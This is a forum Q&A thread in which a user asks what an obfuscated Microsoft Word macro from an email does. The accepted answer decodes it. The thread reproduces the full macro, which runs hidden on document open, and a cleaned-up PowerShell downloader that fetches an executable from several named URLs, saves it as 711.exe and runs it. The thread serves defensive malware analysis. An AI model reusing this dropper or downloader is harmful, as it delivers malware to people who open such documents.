What does this Visual Basic code do? Microsoft word macro

Question

I received an email with a word document that had some built in macros. I disabled them and checked them out. The code all looks like gibberish, but maybe someone else can help me figure out what it's doing?

This is on Microsoft word objects:

Private Sub Document_open()
On _
Error _
Resume _
Next
   Second "zFpiVaXZHXwfhz" + "U" + "2692" + "Zt"
   Second "uqwSRYVhz" + "387021345" + "kzB" + "8730"
   Second "kz" + "1499" + "tkAh" + "p"
   Second "P" + "8389"
   Second "4180" + "jmCmdHzM" + "IcRbPsSnK" + "bWtnR"
   Second "357881955" + "3117" + "ijHmwpiFZCcjw" + "bvt"
Shell KlXaMrm + bMdNCkVCVn + zZZwVld, CStr(vbHide)
   Second "pqENJzbA" + "208599822" + "Ovav" + "A"
   Second "HmjZtUmz" + "7073"
   Second "hYRErMnn" + "4277"
End Sub

This is on Modules:

Function KlXaMrm()

On _
Error _
Resume _
Next
Second "IVozFsCNdj" + "muE"
   Second "wwrMmsOX" + "ii"
   Second "7048" + "RLBLOvif"
   Second "315289259" + "bGl" + "wcZUd" + "8842"
bkzhl = Format(Chr(9 + 16 + 4 + 2 + 68)) + "md /V" + "^:O/" + Format(Chr(6 + 11 + 3 + 1 + 46)) + Format(Chr(3 + 5 + 1 + 0 + 25)) + "^" + "s^" + "e^" + "t ^WvU^" + "y=^  " + " ^  ^ " + "^   " + "^   ^ "
Second "IWV" + "FalMBYmN" + "6772" + "vIi"
   Second "BfMwfQziXwj" + "fvQGQha"
   Second "hBcrV" + "380436099"
ipaSHnJ = " " + "^ ^ ^ " + "}" + "}" + "^{" + "^h" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^" + "ta" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "};" + "^k^a^"
Second "31392559" + "BMS"
kVaBhn = "e" + "r^b;Yu" + "r^$ " + "^m^e^tI" + "^-e" + "k" + "o" + "vnI^;"
Second "965" + "5880" + "XJTdjHJSV" + "Abrh"
HzutiHjFO = ")Y^u" + "r^" + "$ ^,^pN" + "B^" + "$" + "(^eliF" + "d"
Second "E" + "5438"
   Second "MhjZXFtjz" + "52832268"
zBPwbjSP = "^a" + "^olnwoD" + ".j^" + "p^X$^{^" + "yr"
Second "oWcn" + "1454"
   Second "UmZTRVGRUadD" + "7070" + "Hb" + "Z"
   Second "GiNa" + "EjiBfz"
   Second "ZLiR" + "iSRc" + "LaHCfQjrI" + "467392171"
   Second "376971481" + "ATq"
wZvZZZCL = "^t{" + ")" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^oi$^" + " n^i" + "^" + " ^pN" + "B^$(h" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^a" + "^e" + "r^o^f^;" + "'" + "^e^x^e"
Second "1426" + "2730" + "131359904" + "2661"
   Second "tZ" + "A"
FVkwvLXivOm = "^.^'+^f" + "aw" + "^$+" + "'\'^+" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "i^" + "l" + "^" + "b^u^p:v"
Second "obmhCVWdl" + "1876"
LEFDwJt = "n" + "e^$^=Y" + "^ur^$;'" + "^1^" + "1^7" + "^' =^ " + "f^aw$;" + ")^'@^" + "'(" + "t" + "ilp^S.^"
Second "mHz" + "2845" + "swVQqO" + "sTaM"
   Second "151506295" + "9519"
   Second "530531760" + "421003665" + "33902179" + "zE"
UjhKfLskOAw = "'^" + "D^GoP/" + "m" + "^o" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "." + "^t"
Second "1424" + "AS" + "qWRt" + "jTfL"
   Second "144" + "385570591" + "YNItdvcRQLGKl" + "273801574"
   Second "8474" + "427918883" + "101014623" + "2181"
oHsEGJKpH = "^o" + "^p^" + "sno" + "r^i" + "//:p^t" + "t^h^@j" + "fW^FVF^" + "8r/m^" + "o" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "." + "e^u" + "v" + "^"
Second "LIdEK" + "9208"
   Second "GHY" + "w"
   Second "licB" + "57965560" + "BkiEX" + "uNEQdXXBb"
wIVBCzu = "ero^o^" + "b" + "a^keep" + "/" + "/^:^p^"
KlXaMrm = bkzhl + ipaSHnJ + kVaBhn + HzutiHjFO + zBPwbjSP + wZvZZZCL + FVkwvLXivOm + LEFDwJt + UjhKfLskOAw + oHsEGJKpH + wIVBCzu
   Second "kmpQXLAuN" + "fh" + "365194270" + "n"
   Second "70996280" + "nJ"
   Second "QTviGhI" + "RV" + "315865801" + "UcJFQ"
End Function
Function bMdNCkVCVn()

On _
Error _
Resume _
Next
Second "FddKlw" + "OTSBodYZZ"
PpRpwRnf = "tth^" + "@uj^l^" + "h^o" + "/m^" + "o" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^.^" + "gn" + "^it" + "nia^p"
Second "wCkfREKOG" + "AfRUmpAd" + "WL" + "GICb"
   Second "rBzjjYzi" + "zL"
LOkOMzwwZEb = "m^ot^su" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "ra" + "^" + "t^sen^" + "o" + "^l//^:" + "p^t^t" + "h"
Second "rlTmjU" + "jYwjHViv" + "dqjiW" + "c"
   Second "WHUDRQuddUoQr" + "lIcDDYCTjsUVWs" + "4956" + "mJ"
   Second "9262" + "171867944" + "464524065" + "7760"
WnITU = "^@u^A" + "/^ur.^m" + "b^s-t" + "^evs^" + "s" + "^ar" + "//^:p^t" + "th" + "@^F^p2G" + "^zx^W/^"
Second "184947357" + "wjOV"
   Second "5399" + "jwuBT"
   Second "402560265" + "449" + "l" + "BBBuHZnMK"
   Second "MrA" + "nMwkzNbY" + "429759967" + "bqC"
WsfkNBcA = "mo" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^.k" + "ro" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "ege" + "l^lo" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "sn" + "i" + "^t" + "r^a^mt^" + "s//" + ":p" + "^t" + "^"
Second "534498195" + "HX" + "vwKkqLAvKmm" + "279702571"
   Second "KYJPBi" + "ivTUzZOfj" + "162850888" + "WbZ"
RqVln = "th'^=" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^oi^$" + ";^" + "t" + "n^e^i" + "^l" + Format(Chr(6 + 11 + 3 + 1 + 46)) + "be^W" + "^.t^e" + "N^ t" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "ejb^o" + "-^w^e" + "n=" + "^j" + "pX^"
Second "fbvS" + "F"
   Second "BmJt" + "Y"
   Second "z" + "qlRwULuPK" + "NE" + "2370"
   Second "467432993" + "510382039" + "V" + "357745589"
TTWnMmnb = "$ ll^e" + "h^s" + "r^e^w^" + "o^p" + "&&" + "^f^o"
Second "FQvcEKz" + "IN" + "419878734" + "aWRD"
   Second "Gs" + "qiWjuwsKkDzj"
   Second "w" + "iZv" + "ri" + "jbl"
HuAjss = "r /L" + " %^5" + " ^" + "in (^" + "37" + "^3,-" + "^1,^0)^" + "do s^e^" + "t" + " 3^1=!3"
Second "IIz" + "pwb" + "OiIRoWEPKvRSu" + "fLYzMV"
   Second "I" + "5470" + "uC" + "vzYpG"
   Second "Prm" + "D"
vWYHrcNLA = "^" + "1!!" + "^WvU^y" + ":~%^5" + ",1!&" + "&i" + "^" + "f %^5" + "=^=^0" + " " + Format(Chr(9 + 16 + 4 + 2 + 68)) + "a^l^l"
Second "QqFfMn" + "mmslG"
fGbIAE = " " + "%3^1:" + "*^" + "3^1^" + "!^"
bMdNCkVCVn = PpRpwRnf + LOkOMzwwZEb + WnITU + WsfkNBcA + RqVln + TTWnMmnb + HuAjss + vWYHrcNLA + fGbIAE
   Second "kWluI" + "lFK"
   Second "FoYWtEQUo" + "SPqoT" + "m" + "1515"
   Second "QHGQ" + "f"
End Function
Function zZZwVld()

On _
Error _
Resume _
Next
Second "15045220" + "Cfku" + "finOQwh" + "mUISHvGpDwIp"
   Second "297480629" + "wXWqc"
   Second "RJ" + "1178" + "XfKGfw" + "znaVlIj"
sFjEfzuO = "=%" + Format(Chr(3 + 5 + 1 + 0 + 25)) + "  " + ""
zZZwVld = sFjEfzuO
   Second "7008" + "530276898"
End Function

I'm guessing this is malicious, but I'm not too familiar with Visual Basic. I'm also not sure if this is the right place to be asking about this.

GSerg · Accepted Answer

All lines that begin with Second is noise that causes a runtime error and does nothing. They only exist to confuse the antivirus.

If you remove them all, you are left with a bunch of string assignments. They all add up to the following string in the end:

cmd /V^:O/C"^s^e^t ^WvU^y=^   ^  ^ ^   ^   ^  ^ ^ ^ }}^{^hc^tac};^k^a^er^b;Yur^$ ^m^e^tI^-ekovnI^;)Y^ur^$ ^,^pNB^$(^eliFd^a^olnwoD.j^p^X$^{^yr^t{)c^oi$^ n^i^ ^pNB^$(hc^a^er^o^f^;'^e^x^e^.^'+^faw^$+'\'^+ci^l^b^u^p:vne^$^=Y^ur^$;'^1^1^7^' =^ f^aw$;)^'@^'(tilp^S.^'^D^GoP/m^oc.^t^o^p^snor^i//:p^tt^h^@jfW^FVF^8r/m^oc.e^uv^ero^o^ba^keep//^:^p^tth^@uj^l^h^o/m^oc^.^gn^itnia^pm^ot^sucra^t^sen^o^l//^:p^t^th^@u^A/^ur.^mb^s-t^evs^s^ar//^:p^tth@^F^p2G^zx^W/^moc^.krocegel^locsni^tr^a^mt^s//:p^t^th'^=c^oi^$;^tn^e^i^lCbe^W^.t^eN^ tcejb^o-^w^en=^jpX^$ ll^eh^sr^e^w^o^p&&^f^or /L %^5 ^in (^37^3,-^1,^0)^do s^e^t 3^1=!3^1!!^WvU^y:~%^5,1!&&i^f %^5=^=^0 ca^l^l %3^1:*^3^1^!^=%"

This is a shell command that runs cmd with switches /V:O and /C:"".
All carets can be deleted from it, because all they do is instruct cmd to treat the next character literally.

The obfuscated command saves a reversed Powershell script in a variable, reverses it back at runtime and launches.

The Powershell script that ends up executing is:

$Xpj=new-object Net.WebClient;
$ioc='http://stmartinscollegecork.com/WxzG2pF@http://rassvet-sbm.ru/Au@http://lonestarcustompainting.com/ohlju@http://peekaboorevue.com/r8FVFWfj@http://ironspot.com/PoGD'.Split('@');
$waf='711';
$ruY=$env:public + '\' + $waf + '.exe';
foreach($BNp in $ioc) {
    try {
        $Xpj.DownloadFile($BNp, $ruY);
        Invoke-Item $ruY;
        break;
    }catch{}
}

It tries to download a file from each of the specified urls, save it into the public folder as 711.exe and run it. It stops at the first successful run.

What does this Visual Basic code do? Microsoft word macro

Answers (2)

Related Questions